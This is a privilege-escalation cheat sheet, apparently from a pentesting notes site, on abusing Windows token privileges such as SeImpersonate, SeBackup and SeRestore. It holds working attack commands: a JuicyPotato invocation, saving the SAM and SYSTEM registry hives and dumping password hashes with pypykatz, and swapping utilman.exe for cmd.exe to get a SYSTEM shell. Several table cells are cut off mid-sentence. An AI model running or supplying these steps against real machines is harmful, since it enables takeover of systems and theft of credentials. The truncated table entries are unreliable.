PRIVILEGES INFORMATION
Privilege | Impact | Tool | Execution path | Remarks |
---|---|---|---|---|
| Admin | 3rd party tool | "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe" | Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon. |
| Threat | Built-in commands | Read sensitve files with | - May be more interesting if you can read %WINDIR%\MEMORY.DMP
- |
| Admin | 3rd party tool | Create arbitrary token including local admin rights with | |
| Admin | PowerShell | Duplicate the | Script to be found at FuzzySecurity |
| Admin | 3rd party tool | 1. Load buggy kernel driver such as | 1. The |
| Admin | PowerShell | 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| Admin | Built-in commands | 1. | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| Admin | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified. |
Exploitation Of Each Privilege Mention Above =>
SeAssignPrimaryToken/SeImpersonatePrivilege:
Get Juicy Potato
on the victim machine And get a CLSID
for potatoes.
Command to execute a script through a privileged user.
.\JuicyPotato.exe -t * -p
c:\path\to\executable.bat
-l 9002 -c '{
CLSID
}'
SeBackup:
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
Download The Files And use pyptkatz to dump hashes
pypykatz registry --sam sam system
Last updated